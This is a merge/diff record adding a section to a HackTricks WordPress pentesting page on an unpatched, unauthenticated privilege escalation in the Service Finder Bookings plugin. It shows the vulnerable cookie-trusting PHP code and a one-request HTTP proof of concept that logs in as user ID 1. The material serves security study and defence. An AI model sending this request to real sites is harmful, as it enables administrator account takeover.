Merge pull request #1384 from HackTricks-wiki/update_Unpatched_Privilege_Escalation_in_Service_Finder_B_20250904_125030

Unpatched Privilege Escalation in Service Finder Bookings Pl...

Author: carlospolop

src/network-services-pentesting/pentesting-web/wordpress.md

@@ -608,6 +608,59 @@ add_action( 'profile_update', function( $user_id ) {
 
 ---
 
+### Unauthenticated privilege escalation via cookie‑trusted user switching on public init (Service Finder “sf-booking”)
+
+Some plugins wire user-switching helpers to the public `init` hook and derive identity from a client-controlled cookie. If the code calls `wp_set_auth_cookie()` without verifying authentication, capability and a valid nonce, any unauthenticated visitor can force login as an arbitrary user ID.
+
+Typical vulnerable pattern (simplified from Service Finder Bookings ≤ 6.1):
+
+```php
+function service_finder_submit_user_form(){
+    if ( isset($_GET['switch_user']) && is_numeric($_GET['switch_user']) ) {
+        $user_id = intval( sanitize_text_field($_GET['switch_user']) );
+        service_finder_switch_user($user_id);
+    }
+    if ( isset($_GET['switch_back']) ) {
+        service_finder_switch_back();
+    }
+}
+add_action('init', 'service_finder_submit_user_form');
+
+function service_finder_switch_back() {
+    if ( isset($_COOKIE['original_user_id']) ) {
+        $uid = intval($_COOKIE['original_user_id']);
+        if ( get_userdata($uid) ) {
+            wp_set_current_user($uid);
+            wp_set_auth_cookie($uid);  // 🔥 sets auth for attacker-chosen UID
+            do_action('wp_login', get_userdata($uid)->user_login, get_userdata($uid));
+            setcookie('original_user_id', '', time() - 3600, '/');
+            wp_redirect( admin_url('admin.php?page=candidates') );
+            exit;
+        }
+        wp_die('Original user not found.');
+    }
+    wp_die('No original user found to switch back to.');
+}
+```
+
+Why it’s exploitable
+
+- Public `init` hook makes the handler reachable by unauthenticated users (no `is_user_logged_in()` guard).
+- Identity is derived from a client-modifiable cookie (`original_user_id`).
+- Direct call to `wp_set_auth_cookie($uid)` logs the requester in as that user without any capability/nonce checks.
+
+Exploitation (unauthenticated)
+
+```http
+GET /?switch_back=1 HTTP/1.1
+Host: victim.example
+Cookie: original_user_id=1
+User-Agent: PoC
+Connection: close
+```
+
+---
+
 ### WAF considerations for WordPress/plugin CVEs
 
 Generic edge/server WAFs are tuned for broad patterns (SQLi, XSS, LFI). Many high‑impact WordPress/plugin flaws are application-specific logic/auth bugs that look like benign traffic unless the engine understands WordPress routes and plugin semantics.
@@ -722,5 +775,7 @@ The server responds with the contents of `wp-config.php`, leaking DB credentials
 - [Hosting security tested: 87.8% of vulnerability exploits bypassed hosting defenses](https://patchstack.com/articles/hosting-security-tested-87-percent-of-vulnerability-exploits-bypassed-hosting-defenses/)
 - [WooCommerce Payments ≤ 5.6.1 – Unauth privilege escalation via trusted header (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/woocommerce-payments/vulnerability/wordpress-woocommerce-payments-plugin-5-6-1-unauthenticated-privilege-escalation-vulnerability)
 - [Hackers exploiting critical WordPress WooCommerce Payments bug](https://www.bleepingcomputer.com/news/security/hackers-exploiting-critical-wordpress-woocommerce-payments-bug/)
+- [Unpatched Privilege Escalation in Service Finder Bookings Plugin](https://patchstack.com/articles/unpatched-privilege-escalation-in-service-finder-bookings-plugin/)
+- [Service Finder Bookings privilege escalation – Patchstack DB entry](https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-booking-6-0-privilege-escalation-vulnerability)
 
 {{#include ../../banners/hacktricks-training.md}}